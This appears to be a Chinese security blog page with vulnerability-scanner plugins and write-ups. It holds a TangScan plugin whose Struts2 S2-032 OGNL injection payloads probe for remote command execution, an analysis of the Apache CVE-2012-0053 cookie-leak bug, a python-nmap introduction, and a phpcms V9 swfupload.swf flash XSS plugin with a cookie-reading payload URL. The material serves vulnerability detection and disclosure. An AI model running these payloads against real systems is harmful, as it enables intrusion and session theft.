from modules.exploit import TSExploit
from StringIO import StringIO

class TangScan(TSExploit):
    """TangScan plugin that checks a target URL for the Struts2 S2-032 issue."""

    def __init__(self):
        # Name the class explicitly: super(self.__class__, self) recurses
        # forever as soon as this class is subclassed.
        super(TangScan, self).__init__()
        self.info = {
            "name": "S2-032 远程命令执行",
            "product": "",
            "product_version": "",
            "desc": """
            S2-032 远程命令执行
            """,
            "license": self.license.TS,
            "author": ["系统"],
            "ref": [
                {self.ref.wooyun: "http://zone.wooyun.org/content/26856"},
            ],
            "type": self.type.rce,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "目标 url"
            }
        })
        self.register_result({
            "status": False,
            "data": {

            },
            "description": "",
            "error": ""
        })

    def _report_vulnerable(self):
        """Mark the current target as vulnerable in ``self.result``."""
        self.result.status = True
        self.result.description = "目标 {url} 存在st2命令执行".format(
            url=self.option.url
        )

    def verify(self):
        """Probe ``self.option.url`` and record the outcome in ``self.result``.

        A GET probe is tried first; when its response body does not start
        with the marker ``88888887`` a multipart POST probe is sent.  The
        target is reported as vulnerable when either response body starts
        with the marker.  A failure of the POST probe is stored in
        ``self.result.error``.
        """
        exp_url = self.option.url + "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"
        try:
            r = requests.get(exp_url)
            content = r.content
        except Exception:
            # Best effort: a failed GET simply falls through to the POST probe.
            # (A bare ``except:`` would also swallow KeyboardInterrupt.)
            content = ''
        if content.startswith('88888887'):
            self._report_vulnerable()
            return

        try:
            headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'}
            data = {r'reqobj': 'com.opensymphony.xwork2.dispatcher.HttpServletRequest',"rpsobj":"com.opensymphony.xwork2.dispatcher.HttpServletResponse","xxoo":"1"}
            files = {'test': ('1.jpg', StringIO('1'))}
            req = requests.Request('POST', self.option.url, headers=headers, data=data,files=files).prepare()

            # The placeholder field name is swapped for the probe expression
            # after the body has been encoded, so it is sent without escaping.
            req.body = req.body.replace('xxoo', r'method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#w=#context.get(#parameters.rpsobj[0]),#w.getWriter().println(88888888-1),#w.getWriter().flush(),#w.getWriter().close(),1?#xx:#request.toStringj')
            # The body length changed above; header values must be strings.
            req.headers['Content-Length'] = str(len(req.body))
            s = requests.Session()
            reponse = s.send(req, timeout=10, verify=False, allow_redirects=False)

            if reponse.content.startswith('88888887'):
                self._report_vulnerable()
        except Exception as e:
            # Keep the console message and also expose the failure through
            # the registered "error" result field.
            self.result.error = str(e)
            print(str(e))

    def exploit(self):
        """Not implemented for this plugin."""
        pass

if __name__ == '__main__':
    # When run as a script, hand a plugin instance to main() from modules.main.
    from modules.main import main
    main(TangScan())

 

谈谈CVE-2012-0053

0x00 前言

看编号就知道是个比较老的洞了,最近测东西的时候又碰到,找了点资料大致看了下形成原因,然后再分享下POC。

0x01 漏洞描述

Apache HTTP Server 2.2.x多个版本没有正确严格限制HTTP请求头信息,HTTP请求头信息超过LimitRequestFieldSize长度时服务器返回400(Bad Request)错误,并在返回信息中将出错请求头内容爆出,攻击者可以利用该漏洞获取httponly cookies。

受影响软件版本:
Apache Http Server:
Affected: 2.2.21, 2.2.20, 2.2.19, 2.2.18, 2.2.17, 2.2.16, 2.2.15, 2.2.14, 2.2.13, 2.2.12, 2.2.11, 2.2.10, 2.2.9, 2.2.8, 2.2.6, 2.2.5, 2.2.4, 2.2.3, 2.2.2, 2.2.0

细节:

1、当HTTP请求头长度大于apache配置LimitRequestFieldSize长度时,服务器返回400错误页面中会携带LimitRequestFieldSize长度的错误请求头内容,如Cookies,User-agent等。

2、HTTP请求头长度不包含HTTP请求头名称与“:”。

3、Cookies请求头不包含多个cookies之间的空格,为实际多个cookies的长度总和。

4、Apache默认配置LimitRequestFieldSize长度为8190,浏览器正常访问默认截取请求头长度最大为4k

5、任意请求头(不限制于Cookie)超过LimitRequestFieldSize长度,服务器都会返回400错误并显示原始错误请求头信息。

 


0x02 漏洞分析

在ap_get_mime_headers_core中,该函数对于两种错误http请求的检查返回的信息出现了问题。

1.缺陷代码如下,在检测http_header超长后会返回Bad Request并将错误的部分返回给浏览器

field[len - 1] = '\0';
apr_table_setn(r->notes, "error-notes",
apr_pstrcat(r->pool,
     "Size of a request header field "
        "exceeds server limit.<br />\n"
        "<pre>\n",
        ap_escape_html(r->pool, field),
        "</pre>\n", NULL));

2.如果检查HTTP请求头中的某个域不包含冒号,则也返回错误的部分

if (!(value = strchr(last_field, ':'))) { /* Find ':' or    */
r->status = HTTP_BAD_REQUEST;      /* abort bad request */
    apr_table_setn(r->notes, "error-notes",
     apr_pstrcat(r->pool,
      "Request header field is "
      "missing ':' separator.<br />\n"
         "<pre>\n",
         ap_escape_html(r->pool,
          last_field),
       "</pre>\n", NULL));
    return;
}

继续阅读 谈谈CVE-2012-0053

nmap from python

0x01 About


 

大家都比较熟悉nmap,nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这亦称 fingerprinting)。它是网络管理员必用的软件之一,也用于评估网络系统安全。

今天分享一下python-nmap,它是python的一个模块库,使用这个模块可以让python很方便地操作nmap扫描器来工作,它是可以帮助管理员完成自动扫描任务和生成报告的工具,它还支持nmap的脚本输出。

python-nmap只提供了nmap中的端口扫描,但输出方式会让人便于信息整理。

前提:使用python-nmap你得先装有nmap该软件

Install from PIP

pip install python-nmap

2345截图20160127212007

继续阅读 nmap from python

Tangscan插件之phpcms V9 /swfupload.swf XSS

最近看到WooYun-2014-69833报告中对swfupload.swf、uploadify.swf造成的flash xss 分析,由于涉及范围广(国内各大cms厂商,包括但不限于dedecms、phpcms、cmseasy、espcms、phpyun、thinksns、骑士人才系统、phpdisk、国微php168、phpok、kesioncms、pageadmin、xheditor、sdcms、emlog、dtcms等)命中率应该还可以,便给Tangscan提交了几个此类型插件,这里也分享一下代码。

先看下漏洞成因

this.movieName = root.loaderInfo.parameters.movieName;

            this.flashReady_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].flashReady");

            this.fileDialogStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogStart");

            this.fileQueued_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueued");

            this.fileQueueError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueueError");

            this.fileDialogComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogComplete");

            this.uploadStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadStart");

            this.uploadProgress_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadProgress");

            this.uploadError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadError");

            this.uploadSuccess_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadSuccess");

            this.uploadComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadComplete");

            this.debug_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].debug");

            this.testExternalInterface_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].testExternalInterface");

            this.cleanUp_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].cleanUp");

代码可见,从参数(root.loaderInfo.parameters.movieName)中获得movieName后直接赋值到一些callback响应函数中,这些函数是js中执行的内容。我们只需闭合前面的"],再闭合try..catch中大括号},即可执行自己的javascript代码,造成反射型XSS。

因为是flash xss,而且没有过多关键字,所以无视浏览器filter和大部分WAF(因为在前端运行),所以影响较大,轻则越权操作、产生XSS、csrf蠕虫,重则直接getshell(结合某些cms的后台getshell技巧)。

 

分享下phpcms V9 /swfupload.swf XSS POC

  • TangScan-ID:TS-2014-17843
#! /usr/bin/env python
# -*- coding: utf-8 -*-

import md5
from thirdparty import requests
from modules.exploit import TSExploit


class TangScan(TSExploit):
    """TangScan plugin that detects the vulnerable swfupload.swf shipped with phpcms V9."""

    def __init__(self):
        # Name the class explicitly: super(self.__class__, self) recurses
        # forever as soon as this class is subclassed.
        super(TangScan, self).__init__()
        self.info = {
            "name": "phpcms V9 /swfupload.swf XSS",
            "product": "phpcmsv9",
            "product_version": "",
            "desc": """
            phpcms V9 /swfupload.swf XSS
            """,
            "license": self.license.TS,
            "author": ["侦探911"],
            "ref": [
                {self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2014-069833"},
            ],
            "type": self.type.xss,
            "severity": self.severity.low,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": ""
            }
        })
        self.register_result({
            "status": False,
            "data": {

            },
            "description": "",
            "error": ""
        })

    def md5(self, content):
        """Return the hexadecimal MD5 digest of ``content``."""
        # hashlib supersedes the long-deprecated ``md5`` module (which no
        # longer exists on Python 3); imported locally so this method does
        # not depend on the file-level imports.
        import hashlib
        return hashlib.md5(content).hexdigest()

    def verify(self):
        """Download the target's swfupload.swf and compare it with the known-vulnerable build.

        The file is fetched from ``<url>/statics/js/swfupload/swfupload.swf``.
        When its MD5 equals the fingerprint below, the target is reported as
        vulnerable together with a verification URL.  A failed request is
        stored in ``self.result.error``.
        """
        flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
        exp_url = "{domain}/statics/js/swfupload/swfupload.swf".format(domain=self.option.url.rstrip('/'))

        try:
            response = requests.get(exp_url, verify=False, timeout=15)
        except Exception as e:
            self.result.error = str(e)
            return

        if self.md5(response.content) == flash_md5:
            self.result.status = True
            self.result.description = "目标 {url} 存在反射XSS, 验证url: {verify_url}".format(
                url=self.option.url,
                verify_url=exp_url + "?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//"
            )

    def exploit(self):
        """Same as ``verify``: this plugin has no separate exploit step."""
        self.verify()


if __name__ == '__main__':
    # When run as a script, hand a plugin instance to main() from modules.main.
    from modules.main import main
    main(TangScan())